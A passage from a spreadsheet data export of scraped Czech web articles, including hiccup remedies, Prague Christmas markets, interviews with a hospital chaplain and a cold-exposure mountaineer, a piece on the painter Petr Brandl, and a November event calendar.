bránici). Snězte lžičku krystalového cukru (či kostku cukru) nebo zkuste cucat citron. Zatáhněte se za jazyk. Velmi pomalu vypijte trochu studené vodu. Před zrcadlem si jemně stiskněte lžičkou čípek v krku. (Pozor na dávivý reflex!) Pokuste se záměrně zalapat po dechu, zakašlat nebo říhnout. Přitáhněte kolena k hrudníku a v této poloze setrvejte. Vyzkoušejte Valsalvův manévr - zavřete ústa, stiskněte si nos a silně vydechnete. Léky na škytavku Při dlouhodobé škytavce může lékař doporučit některé léky. Lék, který by byl určen přímo k zastavení škytavky, sice neexistuje, na základě zkušeností ale lékaři některé léky předepsat mohou. Jedná se např. o antipsychotické léky, léky na uklidnění, léky k léčbě epilepsie, léky proti nevolnosti, svalová relaxancia či léky na krevní tlak. Léčba chronické škytavky je velmi důležitá, pokud se neléčí, vede k nespavosti, vyčerpání, podvýživě, úbytku hmotnosti a celkovém strádání organismu. Prevence škytavky Prevence škytavky vychází z jejích příčin a zahrnuje několik jednoduchých opatření, která pomáhají eliminovat podráždění bránice. Jezte a pijte střídmě, po menších porcích. Jídlo nehltejte, dopřejte si na něj dostatek času. Vyhněte se syceným nápojům, omezte silně kořeněná a pikantní jídla. Jídla a nápoje by měly mít příjemnou teplotu, vyhněte se příliš horkému i příliš studenému. V neposlední řadě omezte kouření a alkohol . Škytavka u dětí Škytavka u dětí a novorozenců je velmi běžná a obvykle neškodná, vyskytuje se dokonce již v prenatálním stádiu. Škytavka u novorozenců a kojenců je relativně běžná, protože jejich bránice je citlivější a snadno reaguje na podněty, jako je krmení, změny teploty či polohy. Může se objevit během kojení, když miminko polkne vzduch. Pozor, škytavku u dětí může vyvolat také cizí předmět v uchu, protože v této situaci dochází k dráždění bloudivého nervu. Jak ulevit miminku od škytavky? Nezapomínejte miminko po krmení nechat odříhnout, což pomůže uvolnit spolykaný vzduch. Udržujte klidné prostředí v domácnosti, stres nebo náhlé pohyby mohou škytavku vyvolat. Jemná masáž zádíček miminka pomůže uvolnit bránici. Pokud škytavka trvá dlouho nebo se opakuje příliš často, poraďte se s pediatrem. Kdy se škytavkou k lékaři? V dostupných doporučeních se uvádí, že pokud škytavka trvá déle než 48 hodin, je důležité vyhledat lékařskou pomoc, pokud je ale stav neúnosný, můžete se vydat pro odbornou pomoc i dříve (po několika hodinách). Zdroje: PharmDr. Jan Bureš Ph.D. V roce 2012 jsem dokončil studium Farmaceutické fakulty v Hradci Králové . Zde jsem následně absolvoval doktorské studium, při němž jsem se věnoval výzkumu nových léčiv a jejich analýze v biologickém materiálu. V rámci úspěšného týmu jsem se zúčastnil řady mezinárodních projektů včetně publikací v odborných zahraničních časopisech. Po obhájení disertační práce vedla má cesta do lékárny. V roce 2016 jsem nastoupil na pozici lékárníka v liberecké pobočce Dr. Max. Moje zaujetí a záliba v číslech, moderních trendech a technologiích mě v rámci společnosti postupně dovedly k novým projektům – aktuálně zajišťuji odborné a provozní vedení několika e-shopových poboček. Současně se jako autor podílím na publikování článků se zdravotní tematikou, což mi pomáhá sledovat aktuální dění v oboru. Ve volném čase se věnuji cestování a počítačovým hrám. V pracovním i osobním životě zastávám přístup „Když už něco děláš, dělej to pořádně!“. Autor: Jan Bureš Autor person Jan Bureš</t>
  </si>
  <si>
    <t>171860</t>
  </si>
  <si>
    <t>152320</t>
  </si>
  <si>
    <t>20241101_466_3265409028_c79d3241bdfa594eed76.html</t>
  </si>
  <si>
    <t>c79d3241bdfa594eed76</t>
  </si>
  <si>
    <t>Vánoční trhy Staroměstské náměstí</t>
  </si>
  <si>
    <t>Vánoční trhy Staroměstské náměstí Staroměstské náměstí Adventní tržiště na Staroměstském náměstí je v posledních letech každoročně oceňováno světovými médii jako jedna z nejkrásnějších vánočních destinací světa. Trhy na Staroměstském náměstí přinášejí do historického centra města atmosféru opravdových českých Vánoc. Ve stáncích je nabízeno především vánoční zboží a české rukodělné výrobky — vánoční ozdoby, vykrajovátka cukroví, dekorace, svíčky z včelího vosku. Sortiment obohatí keramické betlémy, paličkované dečky a ubrusy, ale také háčkované hračky a další dekorace. Zájemci si mohou koupit jmelí a adventní věnce. Po celou dobu konání trhů si mohou návštěvníci trhů užít kulturní program na velkém pódiu. Čekají je živá vystoupení folklórních, národopisných i dětských souborů z celé republiky i ze zahraničí. Tržištěm voní vánoční pokrmy jako jsou svařené víno , horké kaštany, horký punč, medovina, horká čokoláda, vánoční perníčky, pražené mandle nebo vánoční cukroví. Více trasa Adresa Staroměstské náměstí , 110 00, Staré Město , Praha 1 Tato webová stránka je oficiální prezentací Prahy . Je oslavou tohoto města a všech, kteří jej utvářeli a utvářejí.</t>
  </si>
  <si>
    <t>16390</t>
  </si>
  <si>
    <t>13670</t>
  </si>
  <si>
    <t>20241101_467_3321721900_dec8f1339813c2b70f25.html</t>
  </si>
  <si>
    <t>dec8f1339813c2b70f25</t>
  </si>
  <si>
    <t>Letenská husa aneb košt Svatomartinského vína</t>
  </si>
  <si>
    <t>Letenská husa aneb košt Svatomartinského vína Národní zemědělské muzeum Každoroční slavnost spojená s řízenou degustací svatomartinských a mladých vín předních moravských a českých producentů, prezentacemi, ochutnávkami a prodejem vína a různých gastronomických specialit. Více Adresa Kostelní, 170 00, Holešovice , Praha služby a vybavení vhodné pro děti Tato webová stránka je oficiální prezentací Prahy . Je oslavou tohoto města a všech, kteří jej utvářeli a utvářejí.</t>
  </si>
  <si>
    <t>20241101_468_3241489667_4440a54c1dfaa0db62b2.html</t>
  </si>
  <si>
    <t>4440a54c1dfaa0db62b2</t>
  </si>
  <si>
    <t>V Kladenském divadélku se koná Víkendový blešáček</t>
  </si>
  <si>
    <t>V Kladenském divadélku se koná Víkendový blešáček Kategorie: Pozvánka pátek 1. listopad 2024 5:15 Kladenské divadélko v ulici J. Hory zve tento víkend na tradičiní Blešáček. Akce se koná v sobotu i v neděli od 10 do 16 hodin. Přijďte si vybrat nové kousky do svého šatníku nebo prodat ty, které udělají radost někomu dalšímu. Blešáček není ale jen o oblečení, ale i o doplňcích, hračkách, dětských potřebách a všem, co může udělat radost dál. V Divadélku lze při Blešáčku také posedět u sklenky dobrého vína , čaje či kávičky a něčeho na zub. Příští pátek v Kladenském divadélku připraví Svatomartinské menu (8. až 13. listopadu). Jan Murárik Foto: Kladenské divadélko Počasí Kladno Autor: Napsal | Vaše Kladno</t>
  </si>
  <si>
    <t>805000</t>
  </si>
  <si>
    <t>20241101_469_3241283721_ad31b6408e215d09a639.html</t>
  </si>
  <si>
    <t>ad31b6408e215d09a639</t>
  </si>
  <si>
    <t>Na některé věci by ani zdravotník neměl zůstat sám, míní kaplan</t>
  </si>
  <si>
    <t>Shrnutí Na některé věci by ani zdravotník neměl zůstat sám, míní kaplan 1. listopadu 2024 5:13 Jenom jsem se před sestřičkou z Ústřední vojenské nemocnice v pražských Střešovicích zmínil o Pavlu Rumlovi , vyslechl jsem proud vzpomínek na nezapomenutelného duchovního. Člověk, který jako vojenský kaplan prožil i válku proti Saddámu Husajnovi a další vojenské mise, slouží od března 2024 v pražské Všeobecné fakultní nemocnici . Profesi kaplana v případě podplukovníka v záloze Pavla Rumla prozrazuje jen malý zlatý křížek na nemocničním oblečení. | foto: Metro.cz Svěřují se lidé s hříchy nebo s tím, co za hřích považují? Až sedmdesát procent mých pacientů jsou takzvaní „nevěřící“. To je termín, který používám kvůli čtenářům, ale s jako takovým s ním nesouhlasím, je nepřesný. V našem prostředí potkáte buď křesťana, žida, buddhistu či muslima, nebo člověka, který nepraktikuje žádné náboženství; ale ani on není nevěřící. To znamená, že nepotřebuje praktikovat nějaké náboženství a s ním spojené termíny, jakým je třeba slovo hřích. Stejně, vyzpovídávají se? Jasně že ano. Pobyt na nemocničním lůžku přináší konfrontaci se sebou samotným, s mojí minulostí, s mým životem. A čas přemýšlet! Takže si umí každý z nás představit, že v našem životě jsou věci nádherné, o kterých nepřemýšlíme, ale radostně na ně vzpomínáme. Jsou tu ale i propady či stíny, které z hlavy či srdce nevymažete. Zamýšlení se nad nimi někdy opravdu bolí, probouzí lítost či výčitky. Vnímají tady víc pojem konečnosti? Ano. I když nás zrovna nic neohrožuje, v dnešní civilizaci vnímáme konečnost života stále kolem sebe. V nemocnici záleží na oddělení, kam se člověk se svou diagnózou dostane. Stačí jen vidět bolest, a ta je na každém oddělení. Slyšel jsem názor, že je lepší, když zemře starý člověk, než dítě? Co vy na to? Je to tak. Smrt je přirozenou součástí našeho bytí a má přijít po zralém a dobrém životě. Škála nemocí, i těch psychických, je mezi mladou generací a mezi dětmi zvláště po covidu tak alarmující, že i počet dětských úmrtí roste. To se těžko snáší. Neodsunujeme přece jen stále umírání i bolest od sebe k lékařům, do nemocnic? Přání nás odcházejících je být mezi svými, být doma, tohle se nemění. Touha nebýt na své umírání sám. Voláme „mami“! Pokud jde o českou společnost, jsme stále na začátku bolestného procesu, kdy se znovu učíme existovat „pod zorným úhlem věčnosti“. Říkám tomu ztracený selský rozum. Do určité doby smrt, umírání, péče o zesnulé tělo byly přirozenou součástí života. Narození i smrt se odehrávaly v jedné místnosti. Toto jsme ztratili a musíme se to učit. Je to poznat například na rostoucím počtu paliativních týmů. V nemocnicích i v zařízeních k tomu určených, v hospicích. Přes paliativu a hospice se vracíme k realitě přijmout smrt. Umět umřít, pečovat o umírajícího a poté i o jeho tělo. Mluvil jste o potížích mladých. Patří k nim strach z umírání, být u „toho“? I sami rodiče je od toho blokují a dítě se pak sesype z čehokoli. Naprosto souhlasím. Základní příčinou je, že naše civilizace zpohodlněla a je stále měkčí a měkčí. To je vidět v porovnání s národy, které nežijí v takovém luxusu jako my. Já jsem přes sport, takže i zde se porovnání nabízí. Jsme změkčilí. Bohužel. Aby něco nezabolelo naše citlivé děti, tam jim zakryjeme oči. Tam se nedívej. Malíř Jakub Schikaneder namaloval nádherný obraz Vražda v domě. Na dvoře leží mrtvá dívka, obyvatelé domu stojí kolem ní a všichni se na ni s hrůzou dívají. Je tam i holčička, která zvědavě nahlíží, nikdo jí nezakrývá oči. To je správný přístup. Zmiňoval jste se o sportu. Sportoval jsem celý život, hrál volejbal, pak jsem se stal vojákem. V armádě bylo super, že jsme měli povinnost sportovat i v pracovní době. Hráli jsme florbal, fotbal a další. V minulé armádě, před rokem 1989, vojáci z povolání většinou tělocvik nesnášeli, v té profesionální už vládla a vládne soutěživost. Já měl to štěstí, že jsem nastoupil na 4. brigádu rychlého nasazení, nosili jsme červené barety, byli jsme elita! A chtěli to dávat najevo! Ne z donucení, my chtěli. „Tam, kde jiní nestačí“ je heslo této brigády. Fotbal hodně zblízka jsem na stará kolena zažíval osm let jako trenér malých kluků na Dukle . Měl jsem fotbalisty jedenácti až patnáctileté. To bylo báječné. Upřímně. Komu fandíte? Jsem rodilý sparťan. Nezvolil jsem si to. Starší brácha měl Duklu a na mě zbyla Sparta . Říkám zbyla, protože to byla šedesátá léta a tehdy byla Dukla na vrcholu v Evropě i ve světě. Když jsem se pak dostal do úvéenky (Ústřední vojenská nemocnice v Praze - Střešovicích – pozn. autora), tam jsem potkával řadu fotbalistů, reprezentantů. Tehdy jsem všem říkal, že já budu prvním kaplanem ve Spartě . Tehdy Sparta neměla „ducha“, byla zralá na duchovní péči. Sranda, sranda. Potkal jsem se s trenérem Brücknerem, on že je to blbost, že u nás není taková tradice. Ale třeba ve Skotsku mají v kabině na stěně modlitbu – abych přiznal čest soupeři. Tak vidíte, jako sparťan jsem se ocitl na Dukle . I jako sparťan ale musím uznat, a vy jistě taky, že stadion Dukly , Juliska , to je chrám! Když tam ještě nebyla tribuna, sedávali jsme na stráni na dece a čučeli na fotbal, fotbalisty století Masopusta (držitel Zlatého míče), Kvašňáka (Sparťan století)… Je s pacienty někdy i sranda? Je. Mám nezapomenutelnou návštěvu, ještě z ÚVN. Přišel jsem za pánem a on povídá: „Nechal jsem si vás pozvat ze zvědavosti.“ Takže jsem si říkal, o čem se budeme bavit. No, seděli jsme nakonec hodinu a řeč šla o fotbale. Byla to poctivě odpracovaná duchovní péče. Kolik máte času, abyste odhadl pacientovu povahu? Není na to časová norma. Jsem u někoho třeba jen tři minuty, odcházím a on pláče, nebo se směje. V obou případech to byla dobrá návštěva. Někde můžu být třičtvrtěhodinu a mám z toho špatný pocit, protože se mi to nepovedlo. Úspěch kaplanské práce je v tom, že člověka rozmluvíme. Ale někdy musíme i my. Když je pacient méně komunikativní. I tak se stane, že vypustíte větu, která neměla zaznít. Stalo se mi, že jsem se na něco zeptal, a nedošlo mi, že jsem se podobně ptal už čtvrt hodiny předtím, a tím jsem projevil ne úplné soustředění. Že jsem to zapomněl. Ta chyba mě dlouho mrzela. Jaké je věkové rozpětí lidí, kteří si vás žádají? V ÚVN nebyly děti. Často vojáci, v mladším věku, než jsem já. Tady ve Všeobecné fakultní nemocnici děti jsou, ale zatím se s jejich prostředím seznamuji. Už jen z názvů některých dětských oddělení mi jde mráz po zádech. Přitom jsem s dětmi celý život pracoval, mám děti i vnoučky, ale až nadejde chvíle, kdy přijdu v nemocnici k dětskému lůžku… V motolské nemocnici je řada kaplanů, někteří pracují pravidelně s dětmi. Ale berte v úvahu, že v nemocnici nejsem sám voják v poli, patřím do týmu, mám se s kým sdílet. S psychologem, sociálním pracovníkem, psychoterapeutem, se sestrami. Je lepší, aby kaplan chodil v nemocničním oděvu, nebo v civilu? Přišel jsem na to, že je fér chodit v bílém, jsem součástí týmu. Potkal jsem v nemocnici faráře, který byl v „pracovním“, v kolárku, a viděl jsem, jak k sobě přitahuje pozornost, ale i úctu. O tuto úctu přicházím ve chvíli, kdy navlíknu bílý plášť a kalhoty. Má to úskalí, protože jdete po chodbě a lidé se na vás obracejí o radu, říkají mi pane doktore, protože si nevšimnou malého křížku na košili. Takže ale sklízím jinou úctu, vizuálně jsem lékař. A lékařům rád říkám, že v našich pacientských očích jsou pánembohem, stvořitelem, zachráncem. Někdy je pro mě těžké vydržet ty pohledy vystrašených pacientů, kteří čekají před ambulancemi a mají mě za doktora. Někdy jdu jinou chodbou. Ale vždy se představuji, nedochází k mýlce. A nade vše, nemocniční úbor splňuje přísná kritéria na hygienu, a to je dobře! Jak ze zbavíte množství těžkých osudů? Jak nebýt cynik? Je mnoho způsobů, jak se udržovat. Profesně užíváme supervizi, skvělý nástroj, díky němuž lze řešit pracovní problémy. Hodně si mezi sebou jako personál povídáme, sdělená bolest je poloviční. Ale k mé „hygieně“ patří i sport, zajít si na pivo , naštípat dříví. Váš kolega na psychiatrii říkal, že víc než pro pacienty je tu pro lékaře a sestry. Jsem v této nemocnici od března a mohu potvrdit, že pracovníci nemocnice si ke mně nacházejí cestu, byť mě ještě neznají. Kdysi jsem byl na praxi ve vojenské nemocnici v německém Koblenzu u evangelické kaplanky, která tam sloužila sedmnáct let. Říkala: „Počítej s tím, že začneš u pacientů a skončíš u personálu.“ Je to tak. Zažijete, že se vám pověsí na krk sestra a s pláčem říká: „Právě jsme odpojili pacienta.“ Kaplan slouží také svojí přítomností, má být v pravou chvíli na pravém místě. Není samozřejmě výsadou jen kaplanů pomáhat personálu. Ale je jasné, že práce zdravotníků je tak těžká, že na některé situace by zdravotník skutečně neměl být sám. Autor: Pavel Hrabica Autor Pavel Hrabica Rubrika transition_slide Metro - Společnost</t>
  </si>
  <si>
    <t>20241101_47_3264617704_7f167ec267df4f3548d8.html</t>
  </si>
  <si>
    <t>7f167ec267df4f3548d8</t>
  </si>
  <si>
    <t>Na Kilimandžáro vyběhli za 23 hodin. Teď čeká českou expedici otužilecký výstup na Fuji</t>
  </si>
  <si>
    <t>Shrnutí Na Kilimandžáro vyběhli za 23 hodin. Teď čeká českou expedici otužilecký výstup na Fuji Mají za sebou extrémní výstup na nejvyšší bod Afriky . Podařilo se jim překonat světový rekord, který držel známý “Iceman” Wim Hof . Nyní se Budějčák Filip Malý chystá s expedicí na další podobný zážitek. Jako první skupina na světě chtějí otužilecký výstup na japonskou horu Fuji . Co člověk při takto extrémních výkonech zažívá? Dá se na to připravit? A jaký je cíl další expedice? I o tom jsme si povídali v dalším rozhovoru v seriálu (Ne)Obyčejní. Už za pár dní tebe a tvé parťáky z expedice čeká velká výzva. Pojďme teda začít hned “zvostra” a řekni nám, kam letíš... Letíme do Japonska na Mount Fuji a plánujeme jako první otužilci na světě jít Mount Fuji vlastně v zimní sezóně. Je to unikátní tím, že ta hora není úplně uzavřená ve smyslu, že tam není možný jít, ale je z bezpečnostních důvodů uzavřená a nedoporučuje se na ni chodit, protože je to prostě nebezpečné. Samozřejmě letos tam je kvůli nedostatku sněhu trošku teplejší podnebí, než tam v tuto dobu normálně bývá. Ale už hlásí docela mrazy, takže nás čeká výstup v kraťasech, v rukavicích a v čepici do výšky téměř 4000 metrů nad mořem a teploty budou kole minus deseti stupňů. Reálně... takže pocitovka s tím větrem, co tam bývá, je tak minus 25 až 30 stupňů. Fuji je totiž asi největrnější hora na světě. Takže abych se k tomu vrátil, budeme odolávat nazí tady těm extrémním podmínkám. (smích) Kde můžete expedici sledovat? @dominikluks @ondrejxpetr @kachnula @filaa_m @dominikhrib_ @zbynekvlcek Už jsem to zmínila a ty taky, nejdeš tam sám. S kým vyrážíš? My znamená vlastně naše expedice. Je to šest lidí, pět kluků a jedna žena. Dominik Luksů, Domča Hřibů, Kačka Lisová, Ondra Petr a Zbyněk Vlček. Jak nápad na něco takového vznikl? Po loňským Kilimandžáru jsme přemýšleli, co bychom na letošek vymysleli v tom světovém rekordu, který padl loni. Někdo pak přišel s tím, že by bylo fajn dát Japonsko . Měli jsme dva plány, jeden letní, který nebudu prozrazovat, kdyby ho chtěl třeba ještě někdo realizovat, a druhý plán byl pak otužilecky jít na Fuji. Nebude to vyšší než Kilimandžáro , nebudou to tři dny bez spánku, ale bude to asi extrémnější v té intenzitě. Pojďme teda trochu rozvést to Kilimandžáro . Protože už jsi ho také několikrát zmínil... V loňském roce jsme dá se říct vyběhli na Kilimandžáro . Šlo vlastně o co nejrychlejší výstup v expedici bez jakékoliv aklimatizace. Plán byl dát to do 24 hodin, nám se to povedlo za 23 hodin a 12 minut. Dosavadní rekord tam držel Wim Hof , který to měl za 31,5 hodiny. Takže teď vlastně držíme nejrychlejší rekord na Kilimandžaro, co se týče expedice bez jakýkoliv aklimatizace. To zní docela nebezpečně... Je to docela dost nebezpečný. Nejvíc asi v tom, že se tam spojí hodně věcí dohromady. Dehydratace, extrémně nadmořská výška, na člověku se vystřídá zhruba 50 stupňů, protože se začíná ve 30 stupních nad nulou a končí se v minus 20. Spojí se tam to, že člověk dva až tři dny nespí. Co v takový moment člověk prožívá? Dá se to vůbec popsat? Je to přenositelný? Začátek byl fajn, protože je člověk vyspaný. Náročný je to fyzicky. Ale my jsme na to trénovali, takže to nebyl problém. Nekomfort začínal v noci, kdy jsme za sebou měli třeba 24 hodin bez spánku. Začala nám docházet voda a začínala působit ta nadmořská výška. Většinou problémy začínají ve 3000 metrech nad mořem. My jsme šli rovnou do šesti tisíc. Tam už je vlastně míň jak půlka kyslíku, co je tady. Pak už jdeš v takovým stavu, kdy nevíš, jestli sníš nebo co je realita. Člověk zakopává, usíná, motá se. A tohle trvá celou dobu. A to je jen cesta tam. Nutný je dostat se hlavně zpět do nějaké bezpečné zóny. Pro nás to znamenalo dalších deset hodin, než jsme se dostali někam, kde můžeme spát a přežijeme. Ve 4 700 metrech je base camp, kde nám ale řekli, že jestli tam zůstaneme, tak umřeme. Museli jsme proto šlapat ještě deset kiláků a tisíc výškových metrů dolů. Tam jsme došli asi v osm večer, dali jsme si nějakou večeři a šli se spát. To bylo nějakých 43 hodin od začátku, co jsme se probrali ten den, kdy jsme vycházeli. Zobrazit příspěvek na Instagramu Příspěvek sdílený Fíla_M (@filaa_m) Co bylo vlastně cílem? Nebo proč tě něco takového lákalo vyzkoušet? Šlo asi hodně o to ukázat, co dokáže lidský tělo, když se o něj člověk stará. Když trénuje a chová se k němu jako k nejlepšímu kámošovi. Všechny ty věci, který se tam potkaly, jako spánková deprivace, obrovská zima, vysokohorská nemoc, jsou samy o sobě smrtelný. Když je ještě nakombinujete, tak čistě statisticky by to člověk neměl přežít. Ale hele, jsme tady a i bez nějaký větší dlouhodobí újmy. Byl nějaký moment, kdy jsi pochyboval o tom, že to dáte? Já nejsem moc člověk, který by něco vzdával. Ale jeden moment tam byl. Když jsme za 21 hodin došli na Gilman’s Point, v tu chvíli jsme stanovili nový světový rekord. Zbýval nám ale ještě zhruba kilák a 200 výškových metrů na Uhru Peak. U nás to dáš já nevím, za 15 minut chůze? Nám to trvalo 2 a čtvrt hodiny. Věděli jsme, že se dostaneme nahoru, ale nevěděli jsme, v jakým stavu půjdeme zpět. Já už zhruba deset hodin neměl vodu. A protože ten terén už nebyl úplně jednoduchý, bylo jasný, že stačí jedno zaškobrtnutí a je průser. Tam jsem si párkrát uvědomil, že fakt můžu umřít. Jak dlouho výstup na Kilimandžáro běžně trvá? Minimum je 6, standardně se to chodí kolem 9 dní, a to hlavně kvůli aklimatizaci na Mount Meru, kam se před výstupem na Kili chodí. Pod 5 dní to neudělá žádná oficiální cestovka. My jsme to měli opravdu výjimečně, prostě jsme o to požádali. Jak na ten výstup teď vzpomínáš? Bylo to super, měl jsem k tomu několik přednášek, takže si to člověk vlastně pořád obnovuje a připomíná. Samozřejmě ty emoce, které mě dojímaly byly hlavně za začátku. Bylo to opravdu hodně intenzivní a vždycky když vidím nějaký fotky nebo videa, vybaví se mi to. Ne teda všechno, z vrcholu mám samozřejmě trochu okno. (smích) Kilimandžaro byl ale extrém. Na rovinu si myslím, že to Fuji bude jednodušší tím, že je to 10 hodin. Když se cokoliv pokazí, je jednodušší dostat se do nějaké bezpečné zóny. Fuji bude jen o tom, že to bude strašně intenzivní v jednu chvíli. Zobrazit příspěvek na Instagramu Příspěvek sdílený Dominik Luks (@dominikluks) No a co děláš teda ve volným čase? Co Filipa baví, když ráno vstane a má volný den? Pracuju samozřejmě, což je ale taky můj volný čas, který rád věnuju lidem, jelikož trénuju. Mám rád crossfit, i když už to pro mě teď není taková priorita, chci na závody, takže si nechávám nějaký silový tréninky a připravuju se.. No a nejčastěji prostě lezu po horách. Každou středu jsem teď běhal na Plechý. Chodím plavat, do sauny, běhat. No a když nejsem nikde v cizině, tak rád zajedu za našima. Za babičkou. Je jí 85, vždycky si uvaříme turka a ona upeče nějaký koláč. A bavilo tě to vždycky? Chodit po horách, běhat? Dělat sport? No, vlastně ne. Nebo takhle. Jako dítě na vesnici jsem s klukama hrál fotbal, nohejbal, lezli jsme po stromech, stavěli bunkry. To asi nemusím zmiňovat. Ale mám od mala zranění oka a naši se báli, aby se to nezhoršilo, když mě dají na nějaký sport. Takže jsem chvíli hrál fotbal, ale pak mě právě střelili do oka kuličkovkou a bylo po. Ke sportu jsem se pak dostal na vysoké, kdy jsem šel na tělák. Čím dýl jsem na škole byl, čím víc jsem se dozvídal o těle a tak, tím víc mě to bavilo a makal jsem na sobě. Pak jsem jedno léto makal v Americe , kde jsem začal mít pocit, že mi alkohol nedělá dobře, a že je mi ve sportu vlastně líp. Pak už to šlo rychle. Nejlepší období byl pro mě asi covid, kdy jsem se do toho opřel, začal jsem trénovat, našel jsem lásku k horám. Největší obrátky to nabralo za poslední rok po Kilimandžáru . Očekáváš teď něco takového i od Fuji ? Máš nějaký osobní cíl, se kterým tam jedeš? Já od těch rekordů nic moc neočekávám. Nejedu tam za tím výsledkem, ale spíš si jdu pro tu cestu. Já vím, že zní jako klišé, ale já si vyloženě užívám to utrpení během cesty. (smích) Podpořit můžete Filipa na cestě i vy. A to libovolným příspěvkem na 1016572358/5500 Poslední otázka, než ti jen popřeju šťastnou cestu. Celé to musí být určitě i finančně náročné. Pomáhá vám s tím někdo? Máme nějaké sponzory, ale spíš skrze produkty, jako oblečení a tak. Co se peněz týče, tak jsme si to vlastně každý sháněl sám. Většinou nám finančně přispívají lidé kolem nás nebo známí nebo prostě jen ti, které třeba náš plán zaujal. A to je vlastně nejvíc, moc si toho vážíme a všem děkujeme. Autor: Elmíra Talířová Autor Elmira Talířová Rubrika transition_slide Zprávy &amp;gt; Společnost</t>
  </si>
  <si>
    <t>17820</t>
  </si>
  <si>
    <t>20241101_470_3241229021_d7fe0377ef32e3a98a89.html</t>
  </si>
  <si>
    <t>d7fe0377ef32e3a98a89</t>
  </si>
  <si>
    <t>Český Rembrandt alias Petr Brandl vedl život bohéma. Pronajímal si zlatý důl, ale manželka se s ním musela soudit o výživné</t>
  </si>
  <si>
    <t>Český Rembrandt alias Petr Brandl vedl život bohéma. Pronajímal si zlatý důl, ale manželka se s ním musela soudit o výživné Zakladatel vrcholně barokního malířského stylu u nás se narodil v roce 1668 v Praze . Vyučil se v dílně dvorního malíře a správce hradní obrazárny Kristiána Schrödera . Jeho talent byl nepřehlédnutelný, takže se mu zakázky jen hrnuly. Maloval obrazy s náboženskými náměty pro různé kostely – soubor šesti oltářních obrazů pro Břevnovský klášter je považován za jeho nejslavnější pražské dílo. A také portréty – nejznámější je ten, na němž zachytil svou vlastní podobu. Brandl se stal prominentním umělcem, jehož obrazy vyhledávala světská i duchovní aristokracie. A také nejlépe placeným malířem u nás. Honoráře ale dokázal s udivující rychlostí promrhat. Nadaný malíř se totiž zhlédl v rozmařilém životním stylu šlechty. Draze se oblékal, pochutnával si na exotických lahůdkách, popíjel nejvybranější vína , pořídil si koně, kočáry, služebnictvo… Ačkoli si pronajímal zlatý důl, manželka se s ním musela soudit o výživné pro sebe a děti. Dluhy a ustavičné soudní spory s věřiteli jej několikrát dovedly až do domácího vězení. Petr Brandl přezdívaný „Český Rembrandt“ zemřel v Kutné Hoře v roce 1735. Autor: Jitka Škápíková Autor person Jitka Škápíková Rubrika transition_slide Návraty do minulosti</t>
  </si>
  <si>
    <t>20241101_471_3241533248_72a7f1c12cffd9b40fad.html</t>
  </si>
  <si>
    <t>72a7f1c12cffd9b40fad</t>
  </si>
  <si>
    <t>Kalendář akcí — listopad</t>
  </si>
  <si>
    <t xml:space="preserve">Kalendář akcí — listopad CAFÉ SVĚT, Komenského náměstí 85/17 Tel.: 777 825 090 (rezervace vstupenek nebo v kavárně) • Út 5. 11. 17:00 VERNISÁŽ FOTOGRAFKY VANDY ZÁMIŠOVÉ. Fotografka se zaměřuje převážně na portréty. Vernisáž hudebně doprovodí jazzoví muzikanti Jakub Šafr (piano) a Pavel Švestka (housle). Více na www.fotografkavanda.cz. • Čt 7. 11. 18:30 KONCERT SKUPINY JAZZ ALIMENTS. Kapela hrající repertoár cover písní ve stylu gypsy swing, bossa nova, pop, funky a jazz. Více na jazzaliments.cz. • Út 12. 11. 19:00 KONCERT KATEŘINY SVOBODOVÉ A SKUPINY TAJEMOJE. Zpěvačka, klavíristka, textařka a skladatelka Katka Svobodová skupinu Tajemoje založila v roce 2012, roku 2016 společně vydali debutovou desku s názvem V mlze. • Út 26. 11. 18:30 KONCERT SKUPINY TROJBOY. Skupina Trojboy hraje vlastní i převzaté písně z oblasti folkové a country hudby. DŮM DĚTÍ A MLÁDEŽE NA VÝSTAVIŠTI, Husova 201 Tel.: 326 323 281, www.ddm-mb.cz Na pravidelné akce je potřeba kromě registrace v rezervačním systému DDM nutná i rezervace na jednotlivá setkání prostřednictvím systému Reenio. Pavilon DDM Tel.: 326 728 430, pavilon@ddm-mb.cz • So 9. 11. 8:30–14:00 MĚSTSKÉ KOLO NERFLIGY. 8. ZŠ. Sestavte tříčlenný tým a přihlaste se do turnaje. Přihlášky do 6. 11., pak dostanete informace. Startovné: 150 Kč za osobu. • Čt 28. 11. 17:00–17:45 SKÁKAVÁ PRINCEZNA. Loutková pohádka o krásné princezně Jarmilce. Loutkářský soubor Jitřenka. Vhodné pro diváky od 4 let. Vstupné: 50 Kč. • Čt 5. 12. 16:00–20:00 MĚSTEM CHODÍ MIKULÁŠ. Rezervace a platby do 29. 11. (platby pouze v hotovosti na Pavilonu DDM). Pouze Mladá Boleslav (+ Kosmonosy, Dubce, Jemníky ). Cena: 1–2 děti 300 Kč, 3–5 dětí 350 Kč, každé další 100 Kč. Vila DDM Tel.: 326 323 281, keramika@ddm-mb.cz • Čt 7. 11. 15:00–18:00 KERAMICKÁ DÍLNA PRO VEŘEJNOST (KLUB). Pro širokou veřejnost od malých dětí (v doprovodu rodiče), pro školní děti, tak i pro dospělé. Nutná registrace. Cena za dítě 170 Kč/dospělí 250 Kč (cena za dvě hodiny vyrábění). • So 9. 11. 9:00–13:00 ŠITÍ PRO RADOST (KLUB). Pro starší děti, mládež a dospělé. Informace a přihlášení na tel. čísle či e-mailu do 7. 11. Cena: 350 Kč. • Čt 28. 11. 15:00–18:00 KERAMICKÁ DÍLNA PRO VEŘEJNOST (GLAZOVÁNÍ). Malování barevnými glazurami na již vyrobené výrobky. Pro účastníky keramických dílen zdarma. • Každé úterý 9:00–11:30 KERAMIKA PRO NEJMENŠÍ S RODIČI. Pro děti v doprovodu rodičů. Nutná registrace. Cena za dítě/setkání 170 Kč. • Každý čtvrtek 9:00–11:30 TVOŘÍLEK PRO NEJMENŠÍ S RODIČI. Tvořivé a hravé dopoledne pro děti v doprovodu rodiče či prarodiče. Cena za lekci 170 Kč. Ekocentrum Zahrada Tel.: 326 329 113, zahrada@ddm-mb.cz • Pá 29. 11. 17:00–20:00 ADVENTNÍ WORKSHOP. Přijďte si vyrobit čistě přírodní adventní věnec s Bětkou a Aničkou ze Šáší a čaprčí. Vhodné pro dospělé i děti od 10 let. Přihlášky předem na tel. 724 985 156 nebo na martina.kotlabova@ddm-mb.cz, nejpozději do 26. 11. Cena za věnec: 600 Kč. • Každé úterý 8:00–10:00 KLUB MEDVÍDCI. Klub pro děti v doprovodu rodičů. Je zaměřený na rozvoj jemné motoriky a rozvíjení pohybových schopností dětí. Před první návštěvou i na jednotlivá setkání nutná rezervace. Cena za dopoledne 250 